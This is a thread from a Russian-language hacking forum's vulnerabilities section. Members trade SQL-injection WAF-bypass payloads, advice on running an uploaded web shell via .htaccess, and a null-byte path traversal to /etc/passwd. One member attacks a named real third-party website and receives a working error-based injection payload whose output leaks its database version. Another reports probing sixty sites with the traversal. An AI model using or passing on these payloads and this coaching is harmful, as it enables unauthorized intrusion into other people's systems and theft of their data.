HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2901  
Старый 22.03.2021, 13:38
Samozvanec
Guest
Сообщений: n/a
Провел на форуме:
1545

Репутация: 1
По умолчанию

Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:

Код:
Code:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.

Всем заранее спасибо!
 
Ответить с цитированием

  #2902  
Старый 24.03.2021, 15:14
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от Samozvanec  
Samozvanec said:

Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:
Код:
Code:
products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.
Всем заранее спасибо!
В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос

Код:
Code:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.

В конце концов выйдет так:

Код:
Code:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
 
Ответить с цитированием

  #2903  
Старый 24.03.2021, 18:09
Samozvanec
Guest
Сообщений: n/a
Провел на форуме:
1545

Репутация: 1
По умолчанию

Цитата:
Сообщение от fandor9  
fandor9 said:

В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос
Код:
Code:
id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
В конце концов выйдет так:
Код:
Code:
24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
Надо же, как всё тривиально! И как же я сам до этого не додумался! Спасибо огромное за ответ!
 
Ответить с цитированием

  #2904  
Старый 27.03.2021, 09:41
3nvY
Guest
Сообщений: n/a
Провел на форуме:
15245

Репутация: 11
По умолчанию

Доброго времени суток. Столкнулся с проблемой при загрузке шелла.

На сайте есть функция загрузки аватарки, в запросе можно подменить расширение файла на какое угодно. Файл успешно грузится на сервак, но при переходе по ссылке он открывается как пикча (как ссылка внутри тега img), какое бы расширение я не выбрал. В ответе сервер возвращает content type image/jpeg (или тот, биты которого я подставляю в пэйлоад). Подмена mime type в реквесте на отличное от gif/png/jpeg не дает залить файл.

Как можно запустить код эксплойта?

Сервер: nginx
 
Ответить с цитированием

  #2905  
Старый 27.03.2021, 13:30
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Попробуй залить .htaccess с разрешение на пхп
 
Ответить с цитированием

  #2906  
Старый 30.03.2021, 15:21
Samozvanec
Guest
Сообщений: n/a
Провел на форуме:
1545

Репутация: 1
По умолчанию

Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT

Код:
Code:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
PS

waf обошел,

Код:
Code:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
но не могу спровоцировать вывод уязвимых полей
 
Ответить с цитированием

  #2907  
Старый 02.04.2021, 00:32
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Всем привет!

Код:
Code:
$page = isset($_GET['lang']) ? $_GET['lang'] : 'default';
if (! is_file('./language/'.$page.'/language.php')) {
    $page = 'default';
}
require_once './language/default/language.php';
if ('default' != $page) {
    include_once './language/'.$page.'/language.php';
}
Php version 5.3.6


Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?
 
Ответить с цитированием

  #2908  
Старый 02.04.2021, 07:35
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от WallHack  
WallHack said:

Всем привет!
Php version
[COLOR="rgb(89, 179, 0)"]5.3.6
[/COLOR]
[COLOR="rgb(191, 191, 191)"]Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?[/COLOR]
Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
 
Ответить с цитированием

  #2909  
Старый 02.04.2021, 10:48
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

Цитата:
Сообщение от Samozvanec  
Samozvanec said:

Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT
Код:
Code:
www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
PS
waf обошел,
Код:
Code:
http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
но не могу спровоцировать вывод уязвимых полей
Error-Based например:

Код:
Code:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-
Код:
Code:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid
 
Ответить с цитированием

  #2910  
Старый 02.04.2021, 11:21
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
Спасибо за ответ!

Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало

Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ